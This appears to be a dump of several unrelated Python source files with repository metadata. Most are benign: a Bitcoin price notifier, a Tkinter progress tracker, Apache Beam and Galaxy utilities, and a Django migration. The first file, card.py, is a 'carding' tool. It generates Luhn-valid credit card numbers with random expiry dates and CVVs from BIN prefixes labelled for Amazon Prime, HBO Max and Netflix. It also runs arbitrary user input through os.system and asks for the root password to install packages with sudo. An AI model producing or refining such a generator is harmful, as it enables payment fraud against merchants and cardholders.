794648069e96afcb9bf659a0b2f81ed33d33e60d | 2,221 | py | Python | card.py | abalesluke/carding | 4961fd6d167bb07795887ff03c6fe85a23452d14 | [
"CC0-1.0"
] | null | null | null | card.py | abalesluke/carding | 4961fd6d167bb07795887ff03c6fe85a23452d14 | [
"CC0-1.0"
] | null | null | null | card.py | abalesluke/carding | 4961fd6d167bb07795887ff03c6fe85a23452d14 | [
"CC0-1.0"
] | null | null | null | #!/usr/bin/python3
import random, time, os
#sololearn bin = 5235915354xxxxxx
try:
from colorama import Fore
from credit_card_checker import CreditCardChecker as ccc
f = Fore
r = f.RED
y = f.YELLOW
g = f.GREEN
b = f.BLUE
def menu():
print(f"""{y}
| |
|===============================|
|-------------------------------|
~~~~~[+]{r}By: Anikin Luke{y} [+]~~~~~~
Valid/Live CC-Generator
[1] ===== Amazon Prime Video CC
[2] ===== HBO max CC
[3] ===== Netflix CC
[4] ===== CC-checker(CreditCard-Checker)
[0] ===== Exit
[000] === Shutdown...
-h or help to show this msg
|-------------------------------|
|===============================|
| |""")
def generator(bin):
numbers = '1234567890'
yyyy = ["2022","2023","2024","2025","2026","2027","2028",]
mm = ["01","02","03","04","05","06","07","08","09","10","11","12",]
print("How many cc to generate")
ui = int(input("Enter any Value: "))
amount = 0
while amount != ui:
y_r = random.choices(yyyy)
y_j = ''.join(y_r)
m_r = random.choices(mm)
m_j = ''.join(m_r)
cvv_r = random.choices(list(numbers), k=3)
cvv_j = ''.join(cvv_r)
cc_r = random.choices(list(numbers), k=5)
cc_j = bin+''.join(cc_r)
check = ccc(cc_j).valid()
if check == True:
amount +=1
print(f"{cc_j}|{m_j}|{y_j}|{cvv_j}")
time.sleep(.1)
def main():
menu()
while True:
print(f'{r}┌──({y}Anikin㉿Luke)-[~/Carding]')
ui = input(f"{r}└─>->>{g} ")
if ui == '1':
bin = '45101560210'
generator(bin)
elif ui == '2':
bin = '52215801230'
generator(bin)
elif ui == '3':
bin = '52215800230'
generator(bin)
elif ui == '4':
for i in range(10):
print(f"{y}COMMING SOON!!")
time.sleep(.1)
elif ui == '000':
os.system("sudo shutdown now")
elif ui == '0':
os.system("clear")
break
elif ui =='-h' or ui == 'help':
menu()
else:
os.system(ui)
main()
except ImportError as imerr:
print("Some python modules are/is not installed!\n Enter root password to grant us permission to auto install this required modules!")
os.system('sudo pip3 install colorama; sudo pip3 install credit_card_checker')
| 21.563107 | 135 | 0.529941 |
794648b42f2ef13508e219a55d915416a8d9b950 | 1,054 | py | Python | fedjax/aggregators/__init__.py | alshedivat/fedjax | ff46ba9955f167160353d7be72f6f5e1febee32c | [
"Apache-2.0"
] | 143 | 2020-12-24T03:30:02.000Z | 2022-03-29T04:07:18.000Z | fedjax/aggregators/__init__.py | alshedivat/fedjax | ff46ba9955f167160353d7be72f6f5e1febee32c | [
"Apache-2.0"
] | 14 | 2021-01-08T21:29:17.000Z | 2022-03-07T23:17:23.000Z | fedjax/aggregators/__init__.py | alshedivat/fedjax | ff46ba9955f167160353d7be72f6f5e1febee32c | [
"Apache-2.0"
] | 24 | 2021-01-09T04:39:26.000Z | 2022-03-29T04:07:11.000Z | # Copyright 2021 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""FedJAX aggregators."""
# Default aggregators.
from fedjax.aggregators.aggregator import Aggregator
from fedjax.aggregators.aggregator import mean_aggregator
# Compression aggregators
from fedjax.aggregators.compression import binary_stochastic_quantize
from fedjax.aggregators.compression import uniform_stochastic_quantize
from fedjax.aggregators.compression import uniform_stochastic_quantize_pytree
from fedjax.aggregators.compression import uniform_stochastic_quantizer
| 42.16 | 77 | 0.816888 |
7946491ca223db24c740732226f26e34b637b45b | 2,395 | py | Python | crypto_notifications.py | stylepatrick/crypto_notifications | 4f269915ea632f8bd4546510e71be03db804001a | [
"MIT"
] | null | null | null | crypto_notifications.py | stylepatrick/crypto_notifications | 4f269915ea632f8bd4546510e71be03db804001a | [
"MIT"
] | null | null | null | crypto_notifications.py | stylepatrick/crypto_notifications | 4f269915ea632f8bd4546510e71be03db804001a | [
"MIT"
] | null | null | null | import requests
import time
from datetime import datetime, timedelta
BITCOIN_PRICE_THRESHOLD = 9000
BITCOIN_API_URL = 'https://api.coinmarketcap.com/v1/ticker/bitcoin/'
IFTTT_WEBHOOKS_URL = 'https://maker.ifttt.com/trigger/{}/with/key/{YOUR-IFTTT-KEY}'
def get_latest_bitcoin_price():
response = requests.get(BITCOIN_API_URL)
response_json = response.json()
return float(response_json[0]['price_usd']) # Convert the price to a floating point number
def get_bitcoin_24percent():
response = requests.get(BITCOIN_API_URL)
response_json = response.json()
return float(response_json[0]['percent_change_24h']) # Convert the price to a floating point number
def get_bitcoin_1percent():
response = requests.get(BITCOIN_API_URL)
response_json = response.json()
return float(response_json[0]['percent_change_1h']) # Convert the price to a floating point number
def post_ifttt_webhook(event, value):
data = {'value1': value} # The payload that will be sent to IFTTT service
ifttt_event_url = IFTTT_WEBHOOKS_URL.format(event) # Inserts our desired event
requests.post(ifttt_event_url, json=data) # Sends a HTTP POST request to the webhook URL
def main():
bitcoin_history = []
while True:
price = get_latest_bitcoin_price()
percent1 = get_bitcoin_1percent();
date = datetime.now()
if percent1 >= 2:
mes = "BTC price increased <b>" + str(percent1) + "%<b> the last 1h! " + date.strftime('%d.%m.%Y %H:%M') + ' $' + str(price)
#print(mes)
post_ifttt_webhook('bitcoin_percent_update', mes)
elif percent1 <= -2:
mes = "BTC price decreased <b>" + str(percent1) + "%<b> the last 1h! " + date.strftime('%d.%m.%Y %H:%M') + ' $' + str(price)
#print(mes)
post_ifttt_webhook('bitcoin_percent_update', mes)
#Send every day the 24h percent
if datetime.now().hour == 6 and datetime.now().minute == 30 and datetime.now().second == 0:
time.sleep(1)
percent24 = get_bitcoin_24percent()
#print(percent24)
post_ifttt_webhook('bitcoin_price_update', percent24)
# Send an emergency notification
if price < BITCOIN_PRICE_THRESHOLD:
#print('emergency')
post_ifttt_webhook('bitcoin_price_emergency', price)
if __name__ == '__main__':
main() | 40.59322 | 136 | 0.665136 |
7946495b586790537d0d92fecb16f222be81f891 | 16,959 | py | Python | prog-o-meter.py | krishane2018/prog-o-meter | 108356b81a5802864d3a03a3a4a117ff491b2cce | [
"MIT"
] | null | null | null | prog-o-meter.py | krishane2018/prog-o-meter | 108356b81a5802864d3a03a3a4a117ff491b2cce | [
"MIT"
] | null | null | null | prog-o-meter.py | krishane2018/prog-o-meter | 108356b81a5802864d3a03a3a4a117ff491b2cce | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
The Prog-o-meter.py program is for tracking progress during a #100DaysofCode challenge (or any other #100DaysofX challenge).
The program gives a graphic overview of ones progress through the challenge, by showing a bar containing 100 fields, showing completed days as colored in, and remaining days as white
Currently, the prog-o-meter only tracks your progress in days, but there are plans for many new features, so stay tuned.
The prog-o-meter is developed as an opensource project, and any contributions are welcome, at https://github.com/lineaba/prog-o-meter
"""
__appname__ = "Prog-o-meter"
__authour__ = "Linea Brink Andersen"
__version__ = "1.0.0"
__license__ = "MIT"
import datetime
try:
import Tkinter as Tk # Python < 3.0
except ImportError:
import tkinter as Tk # Python >= 3.0
class ProgressGUI(object):
"""Class contains all things related to the window displaying the prog-o-meter, including text, buttons and actions linked to buttons.
Attributes:
root: a tkinter root.
filename: the name of the .txt file storing the user's number of days.
username: the name of the user.
days: the number of days the user have completed.
GOAL: The number of days the user is trying to complete (hardcoded to be 100, but might wanna add feature for user to chooses this themselves in the future).
rectagle_list = a list of all rectangle elements to be displayed on canvas.
"""
def __init__(self, _days, _filename, _username):
"""Open a Tkinter window showing the prog-o-meter, a greeting text, and a button to add a new day to progress.
Opens a Tkinter window showing the prog-o-meter belonging to the user with the provided username.
Window contains a greetings text, a count of days untill goal, and the graphical prog-o-meter.
Window contains a button, for user to add one new day to their progress.
Args:
_days: number of days currently completed by the user
_filename: name of file storing user's progress
_username: name of user
"""
# Attributes
self.root = Tk.Tk()
self.filename = _filename
self.username = _username
self.days = _days
self.GOAL = 100
self.rectangle_list = []
self.days_remaining = self.GOAL - self.days
self.completion_date = self.get_completion_date(self.days_remaining-1)
# Tkinter instantiation
self.canvas_layout()
self.button_layout()
self.prog_o_meter()
self.progress()
self.root.mainloop()
def canvas_layout(self):
"""Display a Tkinter canvas.
Creates a 1200x600 px canvas, with a greeting text, and a text stating how many days the user have left untill they reach the goal.
Attributes:
CANVAS_WIDTH: The width of the canvas is hardcoded to 1200 px.
CANVAS_HEIGHT: The height of the canvas is hardcoded to 600 px.
canvas: The Tkinter canvas widget.
countdown_text: A text element on the canvas, stating how many days the user have left before reaching their goal.
"""
self.CANVAS_WIDTH = 1200
self.CANVAS_HEIGHT = 600
VERTICAL_TEXT_POSITION = 100
self.canvas = Tk.Canvas(self.root, width = self.CANVAS_WIDTH, height = self.CANVAS_HEIGHT)
self.canvas.pack()
self.canvas.create_text(self.CANVAS_WIDTH/2, VERTICAL_TEXT_POSITION, text = ("".join(("Hello ", self.username))))
self.countdown_text = self.canvas.create_text(self.CANVAS_WIDTH/2, VERTICAL_TEXT_POSITION+40, justify = Tk.CENTER, text = "".join(("You have ", str(self.days_remaining), " days left!\n\n", "If you code everyday, you will be done with this project on ", self.completion_date)))
def button_layout(self):
"""Display a button with the text "1 more day!" on the canvas.
Creates and display a button with the text "1 more day!" with the function add_day() as callback function. If user have already reached their goal, the button is displayed, but is disabled.
Attributes:
add_day_button: A button with the text "1 more day!", which calls the function add_day
"""
self.add_day_button = Tk.Button(self.root, text = "1 more day!", command = self.add_day)
self.add_day_button.pack()
if self.days >= self.GOAL: # Disable add_day_button if goal have been reached
self.add_day_button.config(state = "disabled")
def prog_o_meter(self):
"""Display a prog-o-meter on the canvas.
Displays a progess-o-meter made of white rectangles. There will be one rectangle pr. day in goal. Rectangles will be displayed right up against each other, making them appear as one long rectangles, with horizontal lines sectioning it.
There will be 50 pixels from left edge of window to first rectangle in prog-o-meter, and 50 pixels from last rectangle to right edge of window.
Rectangles will be 20 pixels high, and their width will be the CANVAS_WIDTH, minus 100 pixels (distance from right+left edge of window to ends of prog-o-meter) divided by number of days in goal.
"""
LEFT_BOUNDARY = 50
RIGHT_BOUNDARY = 50
RECTANGLE_HEIGHT = 20
RECTANGLE_WIDENESS = (self.CANVAS_WIDTH-(LEFT_BOUNDARY+RIGHT_BOUNDARY))/self.GOAL
for i in range(self.GOAL): # Create a rectangle for each day and add it to the rectangle_list
rectangle = self.canvas.create_rectangle(LEFT_BOUNDARY, self.CANVAS_HEIGHT/2, LEFT_BOUNDARY+RECTANGLE_WIDENESS, (self.CANVAS_HEIGHT/2)+RECTANGLE_HEIGHT, fill = "white")
self.rectangle_list.append(rectangle)
LEFT_BOUNDARY += RECTANGLE_WIDENESS
def progress(self):
"""Fill in rectangles in prog-o-meter, to represent the current progress of user.
Fills in rectangles in prog-o-meter to represent the current progress of user, from left to right.
Completed days will be filled out with a solid color (currently hardcoded to be blue).
Remaining days will remain white.
"""
for i in range(self.days): # Color a rectangle pr. completed day blue (from left to right)
self.canvas.itemconfig(self.rectangle_list[i], fill = "blue")
def get_completion_date(self, days_remaining):
"""Calculate the date at which the challenge will be over.
Args:
days_remaining: number of days remaining in the project
Returns:
The project completion date as a string
"""
today = datetime.date.today()
completion_date = today + datetime.timedelta(days=days_remaining)
if 4 <= completion_date.day <= 20 or 24 <= completion_date.day <= 30: # Set the suffix for the day to 'th' if it is between 4 and 20 or between 24 and 30
suffix = "th"
else: # Otherwise, set the suffix for the day to 'st', 'nd' or 'rd' when the day ends with 1, 2 or 3 respectively.
suffix = ["st", "nd", "rd"][completion_date.day % 10 - 1]
return datetime.date.strftime(completion_date, "%B %d{0}, %Y".format(suffix))
def add_day(self):
"""Fill out one more rectangle in prog-o-meter with color, to represent one more day completed.
Callback function to add_day_button. Fills out one more rectangle (most left-ward white rectangle) with color, to represent another day completed.
Color will be diferent from current progress, to make the new day stand out.
(Currently the new-day color is hardcoded to be green, but in the future, user should be able to change this themselves).
"""
self.days += 1
self.days_remaining = self.GOAL - self.days
self.completion_date = self.get_completion_date(self.days_remaining)
self.canvas.itemconfig(self.rectangle_list[self.days-1], fill = "green")
update_days_file(self.filename, self.days)
self.canvas.itemconfig(self.countdown_text, text = "".join(("You have ", str(self.days_remaining), " days left!\n\n", "If you code everyday, you will be done with this project on ", self.completion_date)))
if self.days >=self.GOAL: # Disable add_day_button if goal have been reached
self.add_day_button.config(state = "disabled")
class StartGUI(object):
"""Class contains everything related to starting up the application as a new or returning user.
Attributes:
root: a tkinter root.
choice: The input from the user in the radiobuttons. 1 = returning user, 2 = new user
"""
def __init__(self):
"""Open a Tkinter window, greeting the user, and prompting the to input their status (new/returning user).
Opens a Tkinter window to determine the status of the user (new/returning).
Window contains a greetings text, and two radiobuttons for user input (choice: new/returning user).
Window contains a submit button, for user to click when status have been set using radio-buttons.
"""
# Attributes
self.root = Tk.Tk()
self.choice = Tk.IntVar()
# Tkinter instantiation
self.canvas_layout()
self.input_buttons()
self.root.mainloop()
def canvas_layout(self):
"""Display a Tkinter canvas.
Creates a 300x50 px canvas with a greeting text.
Attributes:
CANVAS_WIDTH: The width of the canvas is hardcoded to 300 px.
CANVAS_HEIGHT: The height of the canvas is hardcoded to 50 px.
canvas: The Tkinter canvas widget.
"""
self.CANVAS_WIDTH = 300
self.CANVAS_HEIGHT = 50
VERTICAL_TEXT_POSITION = 20
self.canvas = Tk.Canvas(self.root, width = self.CANVAS_WIDTH, height = self.CANVAS_HEIGHT)
self.canvas.pack()
self.canvas.create_text(self.CANVAS_WIDTH/2, VERTICAL_TEXT_POSITION, text = "Hello, welcome to the prog-o-meter!")
def input_buttons(self):
"""Display the buttons on the canvas.
Displays a set of two radio buttons, for the user to indicate whether they are a new
or returning user. Window closes when user clicks one of the buttons.
Attributes:
BTTN_WIDTH: The width of the radiobuttons is hardcoded to 18 text units.
"""
BTTN_WIDTH = 18
Tk.Radiobutton(self.root, text = "I already have a meter", variable = self.choice, value = 1, command = self.close_window, indicatoron = 0, width = BTTN_WIDTH).pack(pady = 5)
Tk.Radiobutton(self.root, text = "I don't have a meter yet", variable = self.choice, value = 2, command = self.close_window, indicatoron = 0, width = BTTN_WIDTH).pack(pady = 5)
def close_window(self):
"""Close the Tkinter window."""
self.root.destroy()
def get_state(self):
"""Return the user's choice from radio-buttons.
Returns:
IntVar (1 for returning user, 2 for new user).
"""
return self.choice.get()
class UsernameGUI(object):
"""Class contains everything related to the user providing their name, either to create a new prog-o-meter, or to retrieve a saved one.
Attributes:
root: a tkinter root.
user_type: 1 = returning user, 2 = new user
"""
def __init__(self, _user_type):
"""Open a Tkinter window, greeting the user, and prompting the to input their username.
Opens a Tkinter window for the user to input their name.
Window contains a greeting+instruction text, and a entry field (text field) where the user types their name.
Window contains a submit button, for user to click when they have typed their name.
It does not matter if user types their name with Capital letter, fully capitalized, or in all lower letters. The name will always be in all lower letters in the name of the text file, where the user's data is stored.
The user's name will be displayed in a greeting in the window instantiated by the ProgressGUI class, and the format of the name their will be exactly as they typed it in this window.
That means that if the user types "Linea", first time they use the program, and "linea" second time they use it, the program will open the same .txt storing the data both times, but their name will be displayed differently each time.
"""
# Attributes
self.root = Tk.Tk()
self.username = ""
self.user_type = _user_type
# Tkinter instantiation
self.canvas_layout()
self.input_button()
self.root.mainloop()
def canvas_layout(self):
"""Display a Tkinter canvas.
Creates a 300x50 px canvas with a greeting text and an entry widget (input field for text).
Attributes:
CANVAS_WIDTH: The width of the canvas is hardcoded to 300 px.
CANVAS_HEIGHT: The height of the canvas is hardcoded to 50 px.
canvas: The Tkinter canvas widget.
text_entry: A Tkinter text-entry widget (input field for text)
"""
self.CANVAS_WIDTH = 300
self.CANVAS_HEIGHT = 50
self.canvas = Tk.Canvas(self.root, width = self.CANVAS_WIDTH, height = self.CANVAS_HEIGHT)
self.canvas.pack()
self.text_entry = Tk.Entry(self.root)
self.text_entry.pack()
self.text_entry.focus_force()
if self.user_type == 1: # Display appropriate greeting for returning users
self.canvas.create_text(self.CANVAS_WIDTH/2, 20, text = "Good to see you again! Please enter your name")
elif self.user_type == 2: # Display appropriate greeting for new users
self.canvas.create_text(self.CANVAS_WIDTH/2, 20, text = "Lets get you started! Please enter your name")
def input_button(self):
"""Display the inout button on the canvas.
Displays a submit button, for user to click when they have typed in their name.
When button is clicked, it stores the input name as username, and then closes the Tkinter window.
Attributes:
submit_button: Button with the text "Submit", which calls the function save_and_close
"""
self.submit_button = Tk.Button(self.root, text = "Submit", command = self.save_and_close)
self.submit_button.pack()
self.root.bind('<Return>', self.save_and_close)
def save_and_close(self, event=None):
"""Save input text as username, then close Tkinter window. """
self.username = self.text_entry.get()
self.root.destroy()
def get_name(self):
"""Return the username. """
return self.username
def update_days_file(_filename, _days):
"""Update the file [username].txt, with the current number of days completed.
Args:
_filename: Name of the file to be updated. Should have format [username].txt (username in all lowercase).
_days: the current number of days completed
"""
days_text = open(_filename, "w")
days_text.write(str(_days))
days_text.close()
def read_days_file(_filename):
"""Read the file [username].txt, to retrieve the number of days completed, from last use.
Args:
_filename: Name of the file to be read. Should have format [username].txt (username in all lowercase).
Returns:
Number of days completed
"""
days_text = open(_filename, "r")
days = days_text.read()
days_text.close()
return days
def main():
"""Mainroutine to run the prog-o-meter program.
Opens a window, which lets the user choose if they are a new or returning user.
Opens a new window, which lets the user type their name.
Opens a new window, which shows the user's progress, and how many days remains of the challenge.
"""
start_screen = StartGUI()
user_state = start_screen.get_state()
name_screen = UsernameGUI(user_state)
username = name_screen.get_name()
filename = "".join((username.lower(), ".txt"))
if user_state == 2: #Make a new file for a new user, and set their current progress to 0 days
update_days_file(filename, "0")
days = read_days_file(filename)
days = int(days)
ProgressGUI(days, filename, username)
if __name__ == '__main__':
main()
| 51.23565 | 285 | 0.648741 |
7946497868341e8d158167f99c8ed9e31b10b68d | 67 | py | Python | Chapter04/testscript.py | PacktPublishing/Practical-Network-Automation | fa0e7e81869162fe578cf85166fdccca2acdd418 | [
"MIT"
] | 20 | 2017-12-06T10:53:01.000Z | 2022-02-28T05:13:09.000Z | Chapter04/testscript.py | larisk8ter/Practical-Network-Automation | fa0e7e81869162fe578cf85166fdccca2acdd418 | [
"MIT"
] | null | null | null | Chapter04/testscript.py | larisk8ter/Practical-Network-Automation | fa0e7e81869162fe578cf85166fdccca2acdd418 | [
"MIT"
] | 16 | 2018-02-19T16:16:00.000Z | 2022-02-24T17:06:19.000Z | print('Content-Type: text/plain')
print('')
print('Hello, world!')
| 16.75 | 33 | 0.671642 |
79464b4a04c6e7f064c5353fea799b240a5f7646 | 936 | py | Python | programme/migrations/0057_room_event.py | darkismus/kompassi | 35dea2c7af2857a69cae5c5982b48f01ba56da1f | [
"CC-BY-3.0"
] | 13 | 2015-11-29T12:19:12.000Z | 2021-02-21T15:42:11.000Z | programme/migrations/0057_room_event.py | darkismus/kompassi | 35dea2c7af2857a69cae5c5982b48f01ba56da1f | [
"CC-BY-3.0"
] | 23 | 2015-04-29T19:43:34.000Z | 2021-02-10T05:50:17.000Z | programme/migrations/0057_room_event.py | darkismus/kompassi | 35dea2c7af2857a69cae5c5982b48f01ba56da1f | [
"CC-BY-3.0"
] | 11 | 2015-09-20T18:59:00.000Z | 2020-02-07T08:47:34.000Z | # -*- coding: utf-8 -*-
# Generated by Django 1.10.8 on 2017-11-09 17:40
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('core', '0029_auto_20170827_1818'),
('programme', '0056_auto_20171104_1806'),
]
operations = [
migrations.AddField(
model_name='room',
name='event',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='core.Event'),
),
migrations.AlterField(
model_name='programme',
name='room',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.PROTECT, to='programme.Room', verbose_name='Room'),
),
migrations.AlterUniqueTogether(
name='room',
unique_together=set([('event', 'slug')]),
),
]
| 31.2 | 146 | 0.605769 |
79464b74ba04907821d550c95a426dbaf84dcabb | 73 | py | Python | easy_maps/__init__.py | cyber-barrista/django-easy-maps | 8c0e414f3c48a606dbe471ea8f8e3d06425638db | [
"MIT"
] | null | null | null | easy_maps/__init__.py | cyber-barrista/django-easy-maps | 8c0e414f3c48a606dbe471ea8f8e3d06425638db | [
"MIT"
] | null | null | null | easy_maps/__init__.py | cyber-barrista/django-easy-maps | 8c0e414f3c48a606dbe471ea8f8e3d06425638db | [
"MIT"
] | null | null | null | __version__ = "1.1.2"
import warnings
warnings.simplefilter("default")
| 12.166667 | 32 | 0.753425 |
79464c19c7e29dfa36f005a448d64b0b01e3b977 | 93 | py | Python | Vetor.py | pedrorsvalle/python | 88f51ff3135447b3529298e060dd57b15a206130 | [
"MIT"
] | null | null | null | Vetor.py | pedrorsvalle/python | 88f51ff3135447b3529298e060dd57b15a206130 | [
"MIT"
] | null | null | null | Vetor.py | pedrorsvalle/python | 88f51ff3135447b3529298e060dd57b15a206130 | [
"MIT"
] | null | null | null | vetorlist= [2,3,5,7,11]
i=0
while i < len(vetorlist):
print(vetorlist[i])
i=i+1
| 15.5 | 26 | 0.569892 |
79464c2a7797ad532a10220b785aa126d7dc7296 | 2,523 | py | Python | sdks/python/apache_beam/utils/proto_utils.py | kordek/beam | 65de8b5d40c4806f59da588e68611d4672734eec | [
"Apache-2.0"
] | null | null | null | sdks/python/apache_beam/utils/proto_utils.py | kordek/beam | 65de8b5d40c4806f59da588e68611d4672734eec | [
"Apache-2.0"
] | null | null | null | sdks/python/apache_beam/utils/proto_utils.py | kordek/beam | 65de8b5d40c4806f59da588e68611d4672734eec | [
"Apache-2.0"
] | null | null | null | #
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""For internal use only; no backwards-compatibility guarantees."""
from __future__ import absolute_import
from __future__ import division
from google.protobuf import any_pb2
from google.protobuf import struct_pb2
from google.protobuf import timestamp_pb2
def pack_Any(msg):
"""Creates a protobuf Any with msg as its content.
Returns None if msg is None.
"""
if msg is None:
return None
result = any_pb2.Any()
result.Pack(msg)
return result
def unpack_Any(any_msg, msg_class):
"""Unpacks any_msg into msg_class.
Returns None if msg_class is None.
"""
if msg_class is None:
return None
msg = msg_class()
any_msg.Unpack(msg)
return msg
def parse_Bytes(serialized_bytes, msg_class):
"""Parses the String of bytes into msg_class.
Returns the input bytes if msg_class is None."""
if msg_class is None or msg_class is bytes:
return serialized_bytes
msg = msg_class()
msg.ParseFromString(serialized_bytes)
return msg
def pack_Struct(**kwargs):
"""Returns a struct containing the values indicated by kwargs.
"""
msg = struct_pb2.Struct()
for key, value in kwargs.items():
msg[key] = value # pylint: disable=unsubscriptable-object, unsupported-assignment-operation
return msg
def from_micros(cls, micros):
result = cls()
result.FromMicroseconds(micros)
return result
def to_Timestamp(time):
"""Convert a float returned by time.time() to a Timestamp.
"""
seconds = int(time)
nanos = int((time - seconds) * 10**9)
return timestamp_pb2.Timestamp(seconds=seconds, nanos=nanos)
def from_Timestamp(timestamp):
"""Convert a Timestamp to a float expressed as seconds since the epoch.
"""
return timestamp.seconds + float(timestamp.nanos) / 10**9
| 27.725275 | 96 | 0.743559 |
79464e23a46727bddcf8fd4e60f1a941da7ea274 | 5,326 | py | Python | lib/galaxy/tools/deps/resolvers/brewed_tool_shed_packages.py | ramezrawas/galaxy-1 | c03748dd49c060a68d07bce56eae33e0ba154414 | [
"CC-BY-3.0"
] | null | null | null | lib/galaxy/tools/deps/resolvers/brewed_tool_shed_packages.py | ramezrawas/galaxy-1 | c03748dd49c060a68d07bce56eae33e0ba154414 | [
"CC-BY-3.0"
] | null | null | null | lib/galaxy/tools/deps/resolvers/brewed_tool_shed_packages.py | ramezrawas/galaxy-1 | c03748dd49c060a68d07bce56eae33e0ba154414 | [
"CC-BY-3.0"
] | null | null | null | """
This dependency resolver resolves tool shed dependencies (those defined
tool_dependencies.xml) installed using Platform Homebrew and converted
via shed2tap (e.g. https://github.com/jmchilton/homebrew-toolshed).
"""
import logging
import os
from xml.etree import ElementTree as ET
from .resolver_mixins import (
UsesHomebrewMixin,
UsesInstalledRepositoriesMixin,
UsesToolDependencyDirMixin,
)
from ..resolvers import DependencyResolver, NullDependency
log = logging.getLogger(__name__)
class HomebrewToolShedDependencyResolver(
DependencyResolver,
UsesHomebrewMixin,
UsesToolDependencyDirMixin,
UsesInstalledRepositoriesMixin,
):
resolver_type = "tool_shed_tap"
def __init__(self, dependency_manager, **kwds):
self._init_homebrew(**kwds)
self._init_base_path(dependency_manager, **kwds)
def resolve(self, name, version, type, **kwds):
if type != "package":
return NullDependency(version=version, name=name)
if version is None:
return NullDependency(version=version, name=name)
return self._find_tool_dependencies(name, version, type, **kwds)
def _find_tool_dependencies(self, name, version, type, **kwds):
installed_tool_dependency = self._get_installed_dependency(name, type, version=version, **kwds)
if installed_tool_dependency:
return self._resolve_from_installed_tool_dependency(name, version, installed_tool_dependency)
if "tool_dir" in kwds:
tool_directory = os.path.abspath(kwds["tool_dir"])
tool_depenedencies_path = os.path.join(tool_directory, "tool_dependencies.xml")
if os.path.exists(tool_depenedencies_path):
return self._resolve_from_tool_dependencies_path(name, version, tool_depenedencies_path)
return NullDependency(version=version, name=name)
def _resolve_from_installed_tool_dependency(self, name, version, installed_tool_dependency):
tool_shed_repository = installed_tool_dependency.tool_shed_repository
recipe_name = build_recipe_name(
package_name=name,
package_version=version,
repository_owner=tool_shed_repository.owner,
repository_name=tool_shed_repository.name,
)
return self._find_dep_default(recipe_name, None)
def _resolve_from_tool_dependencies_path(self, name, version, tool_dependencies_path):
try:
raw_dependencies = RawDependencies(tool_dependencies_path)
except Exception:
log.debug("Failed to parse dependencies in file %s" % tool_dependencies_path)
return NullDependency(version=version, name=name)
raw_dependency = raw_dependencies.find(name, version)
if not raw_dependency:
return NullDependency(version=version, name=name)
recipe_name = build_recipe_name(
package_name=name,
package_version=version,
repository_owner=raw_dependency.repository_owner,
repository_name=raw_dependency.repository_name
)
dep = self._find_dep_default(recipe_name, None)
return dep
class RawDependencies(object):
def __init__(self, dependencies_file):
self.root = ET.parse(dependencies_file).getroot()
dependencies = []
package_els = self.root.findall("package") or []
for package_el in package_els:
repository_el = package_el.find("repository")
if repository_el is None:
continue
dependency = RawDependency(self, package_el, repository_el)
dependencies.append(dependency)
self.dependencies = dependencies
def find(self, package_name, package_version):
target_dependency = None
for dependency in self.dependencies:
if dependency.package_name == package_name and dependency.package_version == package_version:
target_dependency = dependency
break
return target_dependency
class RawDependency(object):
def __init__(self, dependencies, package_el, repository_el):
self.dependencies = dependencies
self.package_el = package_el
self.repository_el = repository_el
def __repr__(self):
temp = "Dependency[package_name=%s,version=%s,dependent_package=%s]"
return temp % (
self.package_el.attrib["name"],
self.package_el.attrib["version"],
self.repository_el.attrib["name"]
)
@property
def repository_owner(self):
return self.repository_el.attrib["owner"]
@property
def repository_name(self):
return self.repository_el.attrib["name"]
@property
def package_name(self):
return self.package_el.attrib["name"]
@property
def package_version(self):
return self.package_el.attrib["version"]
def build_recipe_name(package_name, package_version, repository_owner, repository_name):
# TODO: Consider baking package_name and package_version into name? (would be more "correct")
owner = repository_owner.replace("-", "")
name = repository_name
name = name.replace("_", "").replace("-", "")
base = "%s_%s" % (owner, name)
return base
__all__ = ['HomebrewToolShedDependencyResolver']
| 35.271523 | 105 | 0.693203 |
79464e6956844697460966d6c2077ccd409fdcd4 | 13,854 | py | Python | api_level_2/qt/valkkafs.py | olklymov/valkka-examples | 92be5f815cd3927100ccc4220c588bdd7c510797 | [
"MIT"
] | 12 | 2018-06-28T13:40:53.000Z | 2022-01-07T12:46:15.000Z | api_level_2/qt/valkkafs.py | olklymov/valkka-examples | 92be5f815cd3927100ccc4220c588bdd7c510797 | [
"MIT"
] | 6 | 2019-04-29T16:55:38.000Z | 2022-03-04T17:00:15.000Z | api_level_2/qt/valkkafs.py | olklymov/valkka-examples | 92be5f815cd3927100ccc4220c588bdd7c510797 | [
"MIT"
] | 5 | 2019-04-21T15:42:55.000Z | 2021-08-16T10:53:30.000Z | """
valkkafs.py : Framefilter chains for simultaneous decoding, presenting and reading / writing frames to ValkkaFS
* Copyright 2017-2020 Valkka Security Ltd. and Sampsa Riikonen
*
* Authors: Sampsa Riikonen <[email protected]>
*
* This file is part of the Valkka library.
*
* Valkka is free software: you can redistribute it and/or modify
* it under the terms of the GNU Lesser General Public License as
* published by the Free Software Foundation, either version 3 of the
* License, or (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU Lesser General Public License for more details.
*
* You should have received a copy of the GNU Lesser General Public License
* along with this program. If not, see <https://www.gnu.org/licenses/>
*
*/
@file valkkafs.py
@author Sampsa Riikonen
@date 2017
@version 1.2.2
@brief Framefilter chains for simultaneous decoding, presenting and reading / writing frames to ValkkaFS
